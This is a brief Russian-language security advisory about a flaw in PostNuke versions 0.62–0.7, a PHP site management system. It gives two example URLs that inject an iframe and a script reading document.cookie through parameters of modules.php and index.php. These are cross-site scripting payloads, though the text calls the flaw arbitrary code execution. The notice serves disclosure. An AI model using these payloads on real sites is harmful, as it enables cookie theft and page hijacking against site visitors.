PostNuke — система управления сайтом
написанная на php и доступная для Windows и Linux. 

Уязвимость позволяет выполнить произвольный
код при помощи сценариев modules.php и index.php. 

Пример: 

http://one_of_100’s_of_sites/modules.php? op=modload&name=<iframe%20src="http://www.microsoft.com">

http://one_of_100’s_of_sites/index.php? catid=<script>alert (document.cookie)</script>

Уязвимость найдена в PostNuke Development Team PostNuke 0.62-0.7.



Оставить мнение